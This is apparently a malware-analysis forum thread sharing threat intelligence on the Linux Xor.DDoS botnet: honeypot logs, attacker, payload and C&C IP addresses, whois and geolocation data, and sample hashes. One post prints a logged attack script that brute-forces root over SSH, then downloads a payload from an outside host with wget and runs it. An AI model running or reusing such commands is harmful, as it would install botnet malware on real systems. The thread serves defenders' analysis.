A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #26433  by unixfreaxjp
 Tue Aug 04, 2015 1:49 pm
tWiCe wrote: It's confusing that they say:
This report presents an analysis of the attack, the sophisticated attack tool and an inside look into a Tsunami DDoS attack
because this bot has nothing with Tsunami family..
Agreed and let's focus on positive confirmed xor.ddos in hand. If they're back will be in big bulk of network. We can't expect enforcement in PRC to do something of these soon.
 #26480  by unixfreaxjp
 Sun Aug 09, 2015 4:26 pm
attack via ssh:
Code: Select all
2015-08-09 19:05:39+0900 New connection: 43.229.53.88:47431 [session: 782]
2015-08-09 19:05:45+0900 [session=782,ip=43.229.53.88] Remote SSH version: SSH-2.0-PUTTY
2015-08-09 19:05:45+0900 [session=782,ip=43.229.53.88] kex alg, key alg: diffie-hellman-group1-sha1 ssh-rsa
2015-08-09 19:05:45+0900 [session=782,ip=43.229.53.88] outgoing: aes128-ctr hmac-sha1 none
2015-08-09 19:05:45+0900 [session=782,ip=43.229.53.88] incoming: aes128-ctr hmac-sha1 none

2015-08-09 19:05:45+0900 New connection: 43.229.53.88:47432 [session: 783]
2015-08-09 19:05:45+0900 [session=782,ip=43.229.53.88] Got remote error, code 11
2015-08-09 19:05:45+0900 [session=782,ip=43.229.53.88] connection lost
2015-08-09 19:05:46+0900 [session=783,ip=43.229.53.88] Remote SSH version: SSH-2.0-PUTTY
2015-08-09 19:05:46+0900 [session=783,ip=43.229.53.88] kex alg, key alg: diffie-hellman-group1-sha1 ssh-rsa
2015-08-09 19:05:46+0900 [session=783,ip=43.229.53.88] outgoing: aes128-ctr hmac-sha1 none
2015-08-09 19:05:46+0900 [session=783,ip=43.229.53.88] incoming: aes128-ctr hmac-sha1 none
2015-08-09 19:05:47+0900 [session=783,ip=43.229.53.88] NEW KEYS
2015-08-09 19:05:47+0900 [session=783,ip=43.229.53.88] starting service ssh-userauth
2015-08-09 19:05:48+0900 [session=783,ip=43.229.53.88] root trying auth none
2015-08-09 19:05:48+0900 [session=783,ip=43.229.53.88] root trying auth password
2015-08-09 19:05:48+0900 [session=783,ip=43.229.53.88] login attempt [root/123456] succeeded
2015-08-09 19:05:48+0900 [session=783,ip=43.229.53.88] root authenticated with password
2015-08-09 19:05:48+0900 [session=783,ip=43.229.53.88] starting service ssh-connection
2015-08-09 19:05:48+0900 [session=783,ip=43.229.53.88] got channel session request
2015-08-09 19:05:48+0900 [session=783,ip=43.229.53.88] channel open
2015-08-09 19:05:49+0900 [session=783,ip=43.229.53.88] executing command "#!/bin/sh
2015-08-09 19:05:49+0900 [session=783,ip=43.229.53.88] exec command: "#!/bin/sh
2015-08-09 19:05:49+0900 [session=783,ip=43.229.53.88] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
2015-08-09 19:05:49+0900 [session=783,ip=43.229.53.88] wget h00p://192.126.112.88/abf/h12
2015-08-09 19:05:49+0900 [session=783,ip=43.229.53.88] chmod +x h12
2015-08-09 19:05:49+0900 [session=783,ip=43.229.53.88] ./h12
2015-08-09 19:05:49+0900 [session=783,ip=43.229.53.88] "
2015-08-09 19:05:49+0900 [session=783,ip=43.229.53.88] Opening TTY log: log/tty/20150809-190549-1667.log
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88] Running exec command "#!/bin/sh
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88] wget h00p://192.126.112.88/abf/h12
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88] chmod +x h12
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88] ./h12
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88] "
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88] CMD: #!/bin/sh
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88] wget h00p://192.126.112.88/abf/h12
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88] chmod +x h12
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88] ./h12
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88]
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88] Command not found: #!/bin/sh
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88] wget h00p://192.126.112.88/abf/h12
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88] chmod +x h12
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88] ./h12
2015-08-09 19:10:54+0900 [session=783,ip=43.229.53.88] remote close
2015-08-09 19:10:54+0900 [session=783,ip=43.229.53.88] sending close 0
2015-08-09 19:10:54+0900 [session=783,ip=43.229.53.88] got channel session request
2015-08-09 19:10:54+0900 [session=783,ip=43.229.53.88] channel open
2015-08-09 19:10:55+0900 [session=783,ip=43.229.53.88] executing command "ls -la /var/run/gcc.pid"
2015-08-09 19:10:55+0900 [session=783,ip=43.229.53.88] exec command: "ls -la /var/run/gcc.pid"
2015-08-09 19:10:58+0900 [session=783,ip=43.229.53.88] Running exec command "ls -la /var/run/gcc.pid"
2015-08-09 19:10:58+0900 [session=783,ip=43.229.53.88] CMD: ls -la /var/run/gcc.pid
2015-08-09 19:10:58+0900 [session=783,ip=43.229.53.88] Command found: ls -la /var/run/gcc.pid
2015-08-09 19:10:58+0900 [session=783,ip=43.229.53.88] sending close 1
2015-08-09 19:10:58+0900 [session=783,ip=43.229.53.88] remote close
2015-08-09 19:10:58+0900 [session=783,ip=43.229.53.88] Got remote error, code 11
2015-08-09 19:10:58+0900 [session=783,ip=43.229.53.88] connection lost
Sample: https://www.virustotal.com/en/file/9688 ... /analysis/

attacker=43.229.53.88
Code: Select all
 {
  "ip": "43.229.53.88",
  "hostname": "No Hostname",
  "city": "Tsuen Wan",
  "country": "HK",
  "loc": "22.3667,114.1000",
  "org": "AS63857 HOT NET LIMITED"
  }
payload in 192.126.112.88 (h00p://192.126.112.88/abf/h12)
Code: Select all
 {
  "ip": "192.126.112.88",
  "hostname": "No Hostname",
  "city": "Rowland Heights",
  "region": "California",
  "country": "US",
  "loc": "33.9782,-117.9040",
  "org": "AS26484 HOSTSPACE NETWORKS LLC",
  "postal": "91748"
}
CNC1 in ns1.hostasa.org 148.163.29.12:3308
Code: Select all
  {
  "ip": "148.163.29.12",
  "hostname": "we.love.servers.at.ioflood.com",
  "city": "Phoenix",
  "region": "Arizona",
  "country": "US",
  "loc": "33.4319,-112.0150",
  "org": "AS53755 Input Output Flood LLC",
  "postal": "85034",
  "phone": "602"
   }
CNC2 in ns3.hostasa.org 192.126.126.64:3308
Code: Select all
   {
  "ip": "192.126.126.64",
  "hostname": "No Hostname",
  "city": "Los Angeles",
  "region": "California",
  "country": "US",
  "loc": "34.0530,-118.2642",
  "org": "AS26484 HOSTSPACE NETWORKS LLC",
  "postal": "90017"
   }
You do not have the required permissions to view the files attached to this post.
 #26482  by zrav
 Sun Aug 09, 2015 4:46 pm
unixfreaxjp wrote:
tWiCe wrote: It's confusing that they say:
This report presents an analysis of the attack, the sophisticated attack tool and an inside look into a Tsunami DDoS attack
because this bot has nothing with Tsunami family..
Agreed and let's focus on positive confirmed xor.ddos in hand. If they're back will be in big bulk of network. We can't expect enforcement in PRC to do something of these soon.
@unixfreaxjp @tWiCe
The analysis definitely covers a XOR.DDOS variant.

This is the sample referenced in the article:
https://www.virustotal.com/en/file/498f ... /analysis/

The term "Tsunami" is not part of the malware name, rather it is a name for a SYN Flood with large payload.

Thank you for the great work at KM and MMD :)
 #26489  by unixfreaxjp
 Mon Aug 10, 2015 9:47 am
zrav wrote:The term "Tsunami" is not part of the malware name, rather it is a name for a SYN Flood with large payload.
Dully noted, I shall review it thoroughly. Thank you for the kindly share.

Please help to raise awareness of ELF malware.
 #26732  by shibumi
 Wed Sep 16, 2015 12:15 am
More Linux/Xor.DDoS from Host:

43.229.53.90
Code: Select all
inetnum:        43.229.52.0 - 43.229.55.255
netname:        HOTNETLIMITED-HK
descr:          HOT NET LIMITED
descr:          FLAT/RM A30, 9/F SILVERCORP
descr:          INT'L TOWER 707-713 NATHAN RD
descr:          MONGKOK KLN
country:        HK
Code: Select all
34c7ff43c4aeaab36d5904a8c18875c0  f1c
34c7ff43c4aeaab36d5904a8c18875c0  f1ca
bf2b4a61fc7c39659a2570ed27fa155d  g13d
2d7492e904cd98016e95696fb50891c7  h13a
I can't determine the C&C maybe somebody want to look over it.. I only find 2 DNS: 8.8.8.8 and 8.8.4.4
You do not have the required permissions to view the files attached to this post.
 #26736  by unixfreaxjp
 Wed Sep 16, 2015 4:15 am
Xor.DDoS with CNC "hostasa" is backwith its campaign, w/downloads to leg.rar
Details is in here: http://bit.ly/1iuxQuY
Pics:
Image
New CNC IP:
Code: Select all
192.126.126.64 
107.160.40.9
23.234.60.143
Samples:
Code: Select all
 142e14d7872cbd783246d3be0396f3eb3c9fbd2c30d571ff3bd7769e00c08fcd
 8d25feed690c1381f70018f5b905efbc9d8901098371cdeb8f32aa4d358210c7
 a5afcc42f5eb61dc7992576195f8abb1c519d32d8c788b547d3b634277f16681
You do not have the required permissions to view the files attached to this post.
 #26804  by Blaze
 Fri Sep 25, 2015 8:45 pm
Some more Xor.DDoS samples attached. Wrote an accompanying blog post about it as well (includes disinfection + prevention) if interested:
http://bartblaze.blogspot.com/2015/09/n ... rddos.html

Have to do samples in 2 seperate posts as quota reached for attachments otherwise.

In this batch:
Code: Select all
23d0e9fad5922a898e4e7121cf99f369d23e14e9	
0ddcddb83156461e8c6a7cb3ecd1d62854fc9dd2	
a1f2e1fdaa70374fdc4c1986bdfdcfa996e22965	
1850c780998654b4e88adda259f697f49591bb5b	
b74c3dee4f7b59365f9b16af28251dc98463ca65	
4090dbdd0059ba463071e532eac0fe1f02ad4b11	
f7788d69b57dda14971e779585d67d6cab26b8cd	
55ab21b2998f3575c8bddd623c179f840d202970	
36f29a7d484469184eb76aaadd8d275860de83f2	
6d3fccc6be069c3f20866e269241fa805d8d7473	
29f39183617d229e52160d396e254cf2daf4919c	
0f349e75c5e52d2488e01cd03f27ca69cbee3fbb	
50ecb8804501e7ee06dc6e253899f88fdbba6815	
5ee52a60b1b19a5486e1a0bf6ed943912c606687	
f7a0bcf5fc07aa8dca06c3b5ac4ce6285f61c792	
b34b6f0ec42a0153c043b0665ec47bf6e5aac894	
952d4582441f2ce3fb69c459dcf0cb0cd530dedb	
1fd268f71544887b2ac860db90fc6de3dd312733	
01eedc87363b221880b0cfe6b1789026b9ff0c59	
c79cab75129227d4e5cb64d8b4a74ae4f10e83af	
87189877c958b2922ff974215d2083f13cf43c76	
c23f1f464cce155c260962ce0e0e7342c116ee9b	
2c898453d7bbf24d0685f8e714a06c5762203e52	
ba964c19c289de7b4e28ff4e73e062026ff86225	
4ffb64f0d7bc9556f0401270556c0e81be8422cb	
You do not have the required permissions to view the files attached to this post.